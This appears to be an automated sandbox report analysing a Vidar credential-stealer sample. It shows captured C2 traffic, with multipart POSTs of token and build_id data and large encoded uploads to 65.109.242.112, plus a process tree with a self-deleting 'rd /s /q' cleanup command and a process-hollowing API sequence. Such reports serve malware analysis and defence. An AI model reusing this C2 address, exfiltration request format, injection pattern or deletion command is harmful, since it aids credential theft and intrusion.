                                                                                                                                                                                                                                                                Data Ascii: rT+8//fNLlfYLMuDrSGqn9pWn99/++aP7TtOPnf8A75o5X2CzLdL1qoNTs/77/wDfNH9pWfeRx/wGjlfYdi3S1TGpWef9Y/8A3zTv7Tsh/wAtH/75o5X2EWe9aGk/8f4/3H/9BNY39p2J6yuP+A1Pa61Z203mrIxIVgAV9QRWdWnKUGkhWZzL9emajJ/GnO2TUZr1FpFHRFCE0w+9K3vTSals0Qd6QnOaM89KQ1LKEPAzn8KTtmlP+TSdulQ2Uh
                                                                                                                                                                                                                                                                2024-05-12 10:47:40 UTC16355OUTData Raw: 46 4c 48 77 71 51 6e 4e 4c 34 54 6a 78 47 55 56 4b 4e 57 6e 54 63 76 6a 2f 72 39 53 78 52 57 52 2f 61 52 69 73 59 4c 6e 37 50 45 57 30 69 32 6b 66 55 51 77 42 33 53 4e 41 73 73 53 74 36 2f 76 47 4d 66 50 38 41 64 78 55 64 6e 71 47 37 56 72 4f 46 6f 6f 54 47 64 44 46 77 34 32 6a 42 66 37 46 76 4c 45 65 75 37 6e 50 72 57 48 39 72 30 74 64 4e 76 2b 44 2b 64 6a 71 2f 31 65 72 32 54 63 6c 72 62 39 50 79 75 62 66 51 35 46 4b 4b 78 39 4e 38 52 58 73 74 70 34 61 57 65 31 30 35 6a 65 36 32 4c 4f 63 2f 59 59 51 57 69 41 69 34 7a 73 7a 2f 41 42 4e 7a 31 35 36 31 53 67 31 79 57 2b 30 53 59 57 42 73 31 65 30 57 59 33 30 45 38 4b 2b 63 64 73 68 2f 66 52 53 45 66 64 43 6c 63 71 47 55 6a 61 66 6c 49 79 61 50 37 56 68 7a 63 76 4c 2f 41 46 2f 54 44 2f 56 2b 6f 34 63 36 6e
                                                                                                                                                                                                                                                                Data Ascii: FLHwqQnNL4TjxGUVKNWnTcvj/r9SxRWR/aRisYLn7PEW0i2kfUQwB3SNAssSt6/vGMfP8AdxUdnqG7VrOFooTGdDFw42jBf7FvLEeu7nPrWH9r0tdNv+D+djq/1er2Tclrb9PyubfQ5FKKx9N8RXstp4aWe105je62LOc/YYQWiAi4zsz/ABNz1561Sg1yW+0SYWBs1e0WY30E8K+cdsh/fRSEfdClcqGUjaflIyaP7VhzcvL/AF/TD/V+o4c6n
                                                                                                                                                                                                                                                                2024-05-12 10:47:40 UTC16355OUTData Raw: 55 55 6c 41 43 38 55 55 6c 46 41 68 61 4b 53 69 67 42 65 4b 4b 53 69 6b 4d 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 53 69 69 6d 41 55 55 55 55 58 41 4b 4b 4b 4b 51 42 52 52 52 51 4d 4b 53 6c 70 4b 59 42 52 52 52 53 41 4b 51 30 74 49 61 59 42 52 52 52 51 41 55 6c 4c 53 55 41 46 46 46 46 41 77 70 4b 57 6b 70 67 46 46 46 46 41 42 53 55 70 70 4b 42 68 52 52 52 51 41 6c 46 46 46 41 30 42 70 4b 55 30 6c 41 42 53 55 74 4a 51 4d 4b 4b 4b 4b 41 45 6f 6f 37 30 55 44 45 7a 7a 52 51 65 74 46 41 77 6f 6f 6f 6f 41 53 69 69 6a 76 51 4d 53 69 69 69 67 42 4b 4b 4b 4b 59 78 4d 38 30 55 64 36 4b 41 43 6b 6f 6f 6f 41 4b 4d 30 6c 46 41 37 43 35 70 43 61 4b 44 51 4d 53 6b 70 61 53 67 59 55 5a 6f 70 4b 41 43 6b 6f 4e 46 41 77 70 4b 4b 4b 64 68 68 6d 6b 70 61 61 54 36
                                                                                                                                                                                                                                                                Data Ascii: UUlAC8UUlFAhaKSigBeKKSikMKKKKACiiigAooooAKSiimAUUUUXAKKKKQBRRRQMKSlpKYBRRRSAKQ0tIaYBRRRQAUlLSUAFFFFAwpKWkpgFFFFABSUppKBhRRRQAlFFFA0BpKU0lABSUtJQMKKKKAEoo70UDEzzRQetFAwooooASiijvQMSiiigBKKKKYxM80Ud6KACkoooAKM0lFA7C5pCaKDQMSkpaSgYUZopKACkoNFAwpKKKdhhmkpaaT6
                                                                                                                                                                                                                                                                2024-05-12 10:47:40 UTC16355OUTData Raw: 59 55 6c 4c 53 55 44 45 6f 4e 46 42 6f 47 68 4b 53 6c 70 4b 41 43 6d 6d 6e 55 30 30 44 43 69 69 69 67 59 6c 4a 51 61 4b 42 67 61 53 69 69 67 59 6c 46 46 46 41 78 4b 53 67 30 55 44 51 55 6c 46 4a 33 6f 47 4c 53 47 67 30 47 67 42 4b 54 74 52 52 51 55 4a 53 47 6e 47 6d 6d 67 61 46 70 4b 4b 4b 42 69 66 53 6b 70 61 53 67 42 44 7a 52 51 65 61 4b 43 68 4d 38 55 6e 57 6c 4e 4a 51 4d 4b 53 6c 70 74 41 42 52 33 70 61 54 70 51 4d 53 69 6a 70 52 6d 67 59 68 70 4b 58 4e 49 66 2f 77 42 56 41 77 70 4b 50 65 67 39 61 42 68 32 70 4f 74 42 6f 37 39 61 41 44 2f 50 57 6b 7a 2f 41 4a 4e 42 6f 6f 4b 45 6f 50 35 55 64 71 42 32 6f 41 4d 39 63 30 68 50 31 4e 47 65 61 4d 30 44 45 78 6a 76 52 53 2f 72 37 34 70 42 51 4d 54 76 51 61 41 61 4b 41 41 39 61 54 4e 41 36 30 48 70 51 4d 39
                                                                                                                                                                                                                                                                Data Ascii: YUlLSUDEoNFBoGhKSlpKACmmnU00DCiiigYlJQaKBgaSiigYlFFFAxKSg0UDQUlFJ3oGLSGg0GgBKTtRRQUJSGnGmmgaFpKKKBifSkpaSgBDzRQeaKChM8UnWlNJQMKSlptABR3paTpQMSijpRmgYhpKXNIf/wBVAwpKPeg9aBh2pOtBo79aAD/PWkz/AJNBooKEoP5UdqB2oAM9c0hP1NGeaM0DExjvRS/r74pBQMTvQaAaKAA9aTNA60HpQM9
                                                                                                                                                                                                                                                                2024-05-12 10:47:40 UTC689OUTData Raw: 61 74 71 4e 68 66 4e 66 57 56 2f 64 57 31 32 32 63 7a 77 54 4d 6a 6e 50 58 35 67 63 38 30 72 44 75 65 71 58 56 34 74 31 34 69 31 7a 77 6a 62 76 66 36 65 39 79 38 74 35 4e 63 32 56 31 35 63 51 66 37 4b 70 6b 53 61 4d 4c 38 79 62 6c 59 45 62 68 6a 63 61 35 71 46 64 56 30 32 48 53 4e 44 30 61 36 2b 78 33 71 77 50 71 56 39 63 68 74 76 32 66 65 6e 44 46 68 6b 72 73 68 77 63 6a 6e 35 32 41 35 50 50 4b 52 36 39 72 45 56 6e 4e 5a 52 36 72 66 4c 61 58 44 46 35 72 63 58 44 65 58 4b 78 36 6c 6c 7a 68 69 63 44 4f 52 53 72 34 67 31 69 50 56 35 74 56 68 31 4b 36 67 76 35 69 64 39 78 62 79 6d 4a 6a 6e 71 50 6c 78 67 64 4f 42 78 77 4b 4c 42 63 39 4f 67 31 32 61 37 4d 65 70 61 44 50 63 53 58 45 32 74 57 56 68 63 58 4f 30 72 4a 65 52 72 44 6a 4d 67 37 69 52 67 78 49 50 58
                                                                                                                                                                                                                                                                Data Ascii: atqNhfNfWV/dW122czwTMjnPX5gc80rDueqXV4t14i1zwjbvf6e9y8t5Nc2V15cQf7KpkSaML8yblYEbhjca5qFdV02HSND0a6+x3qwPqV9chtv2fenDFhkrshwcjn52A5PPKR69rEVnNZR6rfLaXDF5rcXDeXKx6llzhicDORSr4g1iPV5tVh1K6gv5id9xbymJjnqPlxgdOBxwKLBc9Og12a7MepaDPcSXE2tWVhcXO0rJeRrDjMg7iRgxIPX
                                                                                                                                                                                                                                                                2024-05-12 10:47:42 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:47:42 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-05-12 10:47:42 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                23192.168.2.44975965.109.242.1124432832C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-05-12 10:47:42 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----JEHDHIEGIIIDHIDHDHJJ
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-05-12 10:47:42 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 33 34 63 65 31 39 31 64 39 30 37 35 39 33 32 39 36 65 65 38 38 62 36 37 39 33 61 37 65 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 38 31 61 32 32 33 62 65 63 31 38 30 65 62 66 64 63 34 38 35 34 37 64 33 64 35 62 64 37 38 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------JEHDHIEGIIIDHIDHDHJJContent-Disposition: form-data; name="token"b234ce191d907593296ee88b6793a7e5------JEHDHIEGIIIDHIDHDHJJContent-Disposition: form-data; name="build_id"681a223bec180ebfdc48547d3d5bd784------JEHDHIEGIIIDHIDHDHJJCont
                                                                                                                                                                                                                                                                2024-05-12 10:47:44 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:47:43 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-05-12 10:47:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                24192.168.2.44976065.109.242.1124432832C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-05-12 10:47:45 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----IEHCAKKJDBKKFHJJDHII
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-05-12 10:47:45 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 43 41 4b 4b 4a 44 42 4b 4b 46 48 4a 4a 44 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 33 34 63 65 31 39 31 64 39 30 37 35 39 33 32 39 36 65 65 38 38 62 36 37 39 33 61 37 65 35 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 41 4b 4b 4a 44 42 4b 4b 46 48 4a 4a 44 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 38 31 61 32 32 33 62 65 63 31 38 30 65 62 66 64 63 34 38 35 34 37 64 33 64 35 62 64 37 38 34 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 41 4b 4b 4a 44 42 4b 4b 46 48 4a 4a 44 48 49 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------IEHCAKKJDBKKFHJJDHIIContent-Disposition: form-data; name="token"b234ce191d907593296ee88b6793a7e5------IEHCAKKJDBKKFHJJDHIIContent-Disposition: form-data; name="build_id"681a223bec180ebfdc48547d3d5bd784------IEHCAKKJDBKKFHJJDHIICont
                                                                                                                                                                                                                                                                2024-05-12 10:47:46 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:47:46 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-05-12 10:47:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                Statistics

                                                                                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                Behavior

                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                                Start time:12:46:50
                                                                                                                                                                                                                                                                Start date:12/05/2024
                                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                                                Imagebase:0x630000
                                                                                                                                                                                                                                                                File size:1'153'024 bytes
                                                                                                                                                                                                                                                                MD5 hash:43B0461D2E1C77A8530D66D3E1AE0175
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                                                                                Start time:12:46:50
                                                                                                                                                                                                                                                                Start date:12/05/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                                                Start time:12:46:51
                                                                                                                                                                                                                                                                Start date:12/05/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                                                Imagebase:0x890000
                                                                                                                                                                                                                                                                File size:65'440 bytes
                                                                                                                                                                                                                                                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                                                                Start time:12:47:46
                                                                                                                                                                                                                                                                Start date:12/05/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BGDAAKJJDAAK" & exit
                                                                                                                                                                                                                                                                Imagebase:0x240000
                                                                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                                                                                Start time:12:47:47
                                                                                                                                                                                                                                                                Start date:12/05/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                                                                                Start time:12:47:47
                                                                                                                                                                                                                                                                Start date:12/05/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:timeout /t 10
                                                                                                                                                                                                                                                                Imagebase:0xf50000
                                                                                                                                                                                                                                                                File size:25'088 bytes
                                                                                                                                                                                                                                                                MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                  Execution Coverage:1.3%
                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                  Signature Coverage:5.8%
                                                                                                                                                                                                                                                                  Total number of Nodes:104
                                                                                                                                                                                                                                                                  Total number of Limit Nodes:11
                                                                                                                                                                                                                                                                  execution_graph 51934 6d1048 51935 6d09ad 2 API calls 51934->51935 51936 6d1068 51935->51936 51937 6d10a5 IsValidCodePage 51936->51937 51938 6d10e1 51936->51938 51937->51938 51939 6d10b7 51937->51939 51940 6d10e6 GetCPInfo 51939->51940 51942 6d10c0 51939->51942 51940->51938 51940->51942 51943 6d0ad8 51942->51943 51944 6d0b00 GetCPInfo 51943->51944 51945 6d0b18 51943->51945 51944->51945 51945->51938 51983 6c74da 51984 6c74e7 51983->51984 51985 6c74f3 51984->51985 51987 6c7954 SetFilePointerEx GetFileSizeEx 51984->51987 51987->51985 51930 6c35b5 51933 6c35c2 51930->51933 51931 6c35ed RtlAllocateHeap 51932 6c3600 51931->51932 51931->51933 51933->51931 51933->51932 51946 6d5d87 51947 6d5d97 51946->51947 51948 6d5db5 51946->51948 51947->51948 51950 6c4cfc 51947->51950 51952 6c4d03 51950->51952 51951 6c4d46 GetStdHandle 51951->51952 51952->51951 51953 6c4da8 51952->51953 51954 6c4d59 GetFileType 51952->51954 51953->51947 51954->51952 51873 6c6327 51874 6c6350 51873->51874 51876 6c634c 51873->51876 51876->51874 51896 6c5d35 51876->51896 51878 6c6415 51882 6c6478 WriteFile 51878->51882 51883 6c6429 51878->51883 51879 6c63d5 51880 6c63dc 51879->51880 51881 6c63ff 51879->51881 51880->51874 51905 6c5cb3 GetLastError 51880->51905 51906 6c57ed GetConsoleOutputCP WriteFile WriteFile GetLastError 51881->51906 51885 6c649a GetLastError 51882->51885 51895 6c6410 51882->51895 51886 6c6466 51883->51886 51887 6c6431 51883->51887 51885->51895 51900 6c5dd2 51886->51900 51888 6c6454 51887->51888 51889 6c6436 51887->51889 51908 6c6006 WriteFile GetLastError 51888->51908 51889->51874 51892 6c643f 51889->51892 51907 6c5ee3 WriteFile GetLastError 51892->51907 51895->51874 51897 6c5d47 51896->51897 51898 6c5d8f GetConsoleMode 51897->51898 51899 6c5da8 51897->51899 51898->51899 51899->51878 51899->51879 51903 6c5de1 51900->51903 51901 6c5e92 51901->51874 51902 6c5e51 WriteFile 51902->51903 51904 6c5e94 GetLastError 51902->51904 51903->51901 51903->51902 51904->51901 51905->51874 51906->51895 51907->51874 51908->51895 51955 6c4607 51963 6c3b8b 51955->51963 51958 6c463f 51961 6c4658 LCMapStringW 51958->51961 51959 6c4618 LCMapStringEx 51962 6c465f 51959->51962 51961->51962 51966 6c3da8 51963->51966 51967 6c3dd6 51966->51967 51968 6c3ba1 51966->51968 51967->51968 51973 6c3cab LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 51967->51973 51968->51958 51968->51959 51970 6c3dea 51970->51968 51971 6c3df0 GetProcAddress 51970->51971 51971->51968 51972 6c3e00 51971->51972 51972->51968 51973->51970 51988 f1018d 51991 f101c5 CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 51988->51991 51990 f103a2 WriteProcessMemory 51992 f103e7 51990->51992 51991->51990 51993 f10429 WriteProcessMemory Wow64SetThreadContext ResumeThread 51992->51993 51994 f103ec WriteProcessMemory 51992->51994 51994->51992 51974 6eec80 CreateThread WaitForSingleObject 51975 6eeccb 51974->51975 51977 634a48 51974->51977 51976 6eecd5 ExitProcess 51975->51976 51978 6eeb20 51977->51978 51979 6eeb8a GetModuleHandleA GetProcAddress VirtualAlloc FreeConsole 51978->51979 51980 6eebd0 51979->51980 51981 6eebeb CreateThread WaitForSingleObject 51980->51981 51982 6eec24 51981->51982 51995 689296 GetLastError 51996 6892af 51995->51996 51997 6892c7 SetLastError 51996->51997 51909 6d1022 51910 6d102c 51909->51910 51913 6d0cef 51910->51913 51912 6d103c 51918 6d0e99 51913->51918 51915 6d0d19 51923 6d09ad 51915->51923 51917 6d0d21 51917->51912 51919 6d0ea5 51918->51919 51921 6d0ec6 51919->51921 51929 63513c IsProcessorFeaturePresent 51919->51929 51921->51915 51922 6d0f38 51922->51915 51924 6d09bf 51923->51924 51925 6d09ce GetOEMCP 51924->51925 51926 6d09e0 51924->51926 51927 6d09f7 51925->51927 51926->51927 51928 6d09e5 GetACP 51926->51928 51927->51917 51928->51927 51929->51922

                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                  Function 00F1018D Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 282threadinjectionmemoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00F102FC
                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00F1030F
                                                                                                                                                                                                                                                                  • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00F1032D
                                                                                                                                                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F10351
                                                                                                                                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 00F1037C
                                                                                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 00F103D4
                                                                                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 00F1041F
                                                                                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F1045D
                                                                                                                                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 00F10499
                                                                                                                                                                                                                                                                  • ResumeThread.KERNELBASE(?), ref: 00F104A8
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610766877.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                                                                                                                                                  • String ID: GetP$Load$aryA$ress
                                                                                                                                                                                                                                                                  • API String ID: 2687962208-977067982
                                                                                                                                                                                                                                                                  • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                                                                                                                                                  • Instruction ID: 61be5efa8ab9fbbd842bd3e35cdc83a77f64332e7f5bde310071d8d801897be9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5B1E67664028AAFDB60CF68CC80BDA77A5FF88714F158524EA1CEB341D774FA418B94
                                                                                                                                                                                                                                                                  Function 00634A48 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 80librarymemoryloaderCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,VirtualProtect,?,?,0000000006:1@0000000005:@), ref: 006EEB9E
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 006EEBA5
                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040,?,?,0000000006:1@0000000005:@), ref: 006EEBBC
                                                                                                                                                                                                                                                                  • FreeConsole.KERNELBASE(?,?,0000000006:1@0000000005:@), ref: 006EEBC5
                                                                                                                                                                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,?,00705040,00000000,00000000), ref: 006EEC07
